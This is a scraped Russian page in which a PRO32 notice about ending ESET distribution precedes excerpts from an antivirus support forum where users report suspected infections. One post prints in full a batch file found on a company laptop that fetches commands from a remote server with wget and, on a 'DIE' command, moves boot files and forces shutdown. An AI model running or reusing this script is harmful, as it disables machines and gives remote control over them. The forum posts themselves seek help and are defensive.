Уважаемые пользователи!

Поставщик ИТ-решений PRO32 сообщает вам, что после 17 лет сотрудничества мы более не являемся эксклюзивным дистрибьютором программных продуктов словацкого разработчика ESET в России, Республике Беларусь, Казахстане, Азербайджане, Узбекистане, Кыргызстане, Таджикистане, Туркменистане, Молдове, Грузии и Армении.

Купить и продлить лицензии ESET на нашем сайте больше нельзя.

Предлагаем вам попробовать новый антивирус от компании PRO32.

Продукты PRO32 — это технологичные решения, надежная защита от киберугроз и максимальная производительность устройств на Windows / Android.

Для действующих клиентов ESET мы предлагаем промокод на скидку в размере 15% — ESET15. Скопируйте его и после добавления товара в корзину, не забудьте его применить в корзине.

Выбрать дату в календареВыбрать дату в календаре

Hosts, validation.sls.microsoft.com
Я так понимаю пользователь заблокировал проверку валидности Windows ?
Изменено: Виктор - 19.08.2010 19:20:36
Тупит DC++ подозрение на вирус
При запуске DC++ начинает жутко тормозить ПК..
Еще не работают скрытые файлы и папки, в свойствах папки все включено.
Помогите со скриптом..
Вот лог:
Изменено: Виктор - 14.08.2010 16:49:21
Вирус NOTEPAD
Здравствуйте! столкнулся с файлом помеченным Sysinspector-ом, который содержит в себе характеристики вируса, но визуально это обновленный дизайн стандартного блокнота.
В Local Settings\Temp создает файл NOTEPAD.ini

[B]Отчет антивирусного сканера[/B]: http://www.virscan.org/report/35faf08d4ea3db24768aaffeac80989e.html
Архив отправил на Dmitry.B
Блокировка опасных сайтов ()
Прежде чем начать тему, думаю стоит обратить внимание на принцип блокировки - сочетание символов pоrn полностью закроет доступ к ссылкам сайт[COLOR=#0000FF]ов[/COLOR] (оpen[COLOR=#FF0000]pоrn[/COLOR].net)
Поэтому, кому не столь важны посещения данных сайтов или они случайны, присоединяйтесь.

В настройках находим - "Защита доступа в интернет", "HTTP, HTTPS", "Управление адресами"
В любой момент Вы можете отключить блокирование - убрав галки с опции "Список активизирован"

Так как объем списков не должен превышать 25 Кбайт, создавайте отдельные шаблоны, например:
Угроза заражения 1
Угроза заражения 2
Угроза заражения 3
Вирус bwedky.exe
Возможно данный файл прописывает маршруты.
Залил: http://rghost.ru/2125511
Отчет сканера: http://www.virscan.org/report/e9eeb29a2913192e71762d0018a5461e.html
Запланированные задания (угроза)
Здравствуйте! объясните пожалуйста смысл файла main.bat который запускается автозагрузкой и включает задачи странного названия.

Были выполнены действия:
1) c:\windows\system32\[COLOR=#FF0000]main.bat[/COLOR] удалил файл.
2) Удалил файлы:
c:\windows\tasks\[COLOR=#FF0000]at1.job[/COLOR]
c:\windows\tasks\[COLOR=#FF0000]at2.job[/COLOR]
c:\windows\tasks\[COLOR=#FF0000]at3.job[/COLOR]
c:\windows\tasks\[COLOR=#FF0000]at4.job[/COLOR]
c:\windows\tasks\[COLOR=#FF0000]At1.job[/COLOR]
c:\windows\tasks\[COLOR=#FF0000]At2.job[/COLOR]
c:\windows\tasks\[COLOR=#FF0000]At3.job[/COLOR]
c:\windows\tasks\[COLOR=#FF0000]At4.job[/COLOR]

[COLOR=#006699]route print - чист[/COLOR]

Структура bat файла:
[CODE]@echo off
cd c:\windows\system32
:begin
echo Searching for IP adress...
ipconfig | grep IP
if ERRORLEVEL 2 goto error
if ERRORLEVEL 1 goto noip

:ipfound
echo IP address found in ipconfig output
echo Pinging RMH.RU
ping -n 1 rmh.ru | grep.exe Ping
if ERRORLEVEL 2 goto error
if ERRORLEVEL 1 goto noreply

:inet
echo Reply from RMH.RU retrieved
echo Empty command
echo > command.txt
echo Retrieving command from server...
wget --quiet --input-file=server.url --tries=3 --output-document=command.txt --timeout=30 --no-directories --no-host-directories --cache=off --user-agent=zmey2-0.1
echo Retrieved, checking command
type command.txt | grep STOP
if ERRORLEVEL 2 goto error
if ERRORLEVEL 1 goto end


:STOP
type command.txt | grep STOP > nul
if ERRORLEVEL 2 goto error
if ERRORLEVEL 1 goto wcommand

:die
echo DIE command retrieved
echo Moving boot.ini, ntdetect.com, ntldr

move /y c:\boot.ini c:\windows
move /y c:\ntdetect.com c:\windows
move /y c:\ntldr c:\windows
echo Shuting down
shutdown -s -f -t 0 -c "Computer must be returned"
goto end

:noip
echo IP address not found in ipconfig output
goto end

:noreply
echo No reply from RMH.RU
goto end

:wcommand
echo Wrong command retrieved. Typing command:
echo ---
type command.txt
echo ---
goto end

:error
echo Grep error
goto end

:end
[/CODE]

Вопрос такого характера - ноутбук, предоставлен компанией "Ромир", у меня подозрения, что они какие-то сведения хотели получать, при подключении к их сайту.
Вирус Mail-Send.exe
Отправлял на [email protected]





*********

Это письмо отправлено почтовым сервером yandex.ru

К сожалению, мы вынуждены сообщить Вам о том, что Ваше письмо не может
быть отправлено одному или нескольким адресатам. Причины указаны ниже.

Пожалуйста, не отвечайте на это сообщение.

             **********

This is the mail system at host yandex.ru

I'm sorry to have to inform you that your message could not
be delivered to one or more recipients. It's attached below.

Please, do not reply to this message.


<[email protected]>: host gmail-smtp-in.l.google.com[74.125.39.27] said:
   552-5.7.0 Our system detected an illegal attachment on your message. Please
   552-5.7.0 visit http://mail.google.com/support/bin/answer.py?answer=6590 to
   552 5.7.0 review our attachment guidelines. n23si2238470fam.67 (in reply to
   end of DATA command)
[ Закрыто] Вирус отключил NOD
Номер моего обращения № 279 479

Цитата
Я скачал видео урок, и запустил файл, мне показался подозрительным данный текст - "файл может иногда открываться с задержкой, не спешите закрывать" (для просмотра урока запустите фаил Mail-Send.exe)
Dr.Web и Symantec обнаружили троян!

Вот отчет сканера: http://www.virscan.org/report/2fb364a9befaf3d7d20f750bc508c26b.html
Данный файл скачал с сайта: http://videoypok.ru

Отправил файл в архиве с паролем infected

Оставил негативный отзыв в сторону тех поддержки, в теме "Жалобы"
Давайте решать проблему а не прятаться от своих клиентов!

EAV-31595335
Зараженный компьютер, Логи + файлы
Система была заражена. Сохранил те файлы которые SysInspector указал опасными. Отправил архив под именем sys_dll.zip (пароль infected)
SysInspector & winhttp.dll
Ссылка на этот файл определяется как текущая директория "@%SystemRoot%\system32\winhttp.dll,-100"
А должно по идее ссылаться на C:/windows/system32/winhttp.dll